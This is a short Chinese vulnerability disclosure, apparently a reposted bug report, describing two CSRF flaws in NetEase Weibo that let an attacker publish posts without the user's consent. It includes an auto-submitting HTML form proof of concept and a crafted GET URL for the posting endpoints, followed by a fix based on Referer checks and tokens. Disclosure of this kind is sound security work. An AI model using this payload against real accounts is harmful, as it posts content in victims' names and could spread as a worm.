网易某处CSRF 漏洞 ,可能导致蠕虫蔓延,在未经用户同意的情况下发布微博 在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。 漏洞地址: http://t.163.com/tweet.do?action=addTweet < html > <body> <form id="imlonghao" name="imlonghao" action="http://t.163.com/tweet.do?action=addTweet" method="post"> <input type="text" name="content" value="XXXXXXXXXXX" /> <input type="submit" value="submit" /> </form> <script> document.imlonghao.submit(); </script> </body> </html> 接口返回信息 效果 网易某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布微博 祝程序员粽子节快乐~ GET模式,所以自评15 在接受GET的信息的时候,未对GET来路(Referer)进行验证,同时也没有在GET的信息中加token验证信息的正确性,导致漏洞产生。 漏洞地址: http://t.163.com/article/updatetweet4zt?status=[在此输入你想传播的内容]&ztsite=duanwu1&method=add_butter&modulefrom=zt_update&special_site=duanwu1&keyfrom=op.zt&imageUrl= 接口返回信息 效果 修复方案:检查GET来路和POST来路Referer 在GET和POST的信息中加token 作者imlonghao
查看更多关于网易微博两处CSRF及修复 - 网站安全 - 自学php的详细内容...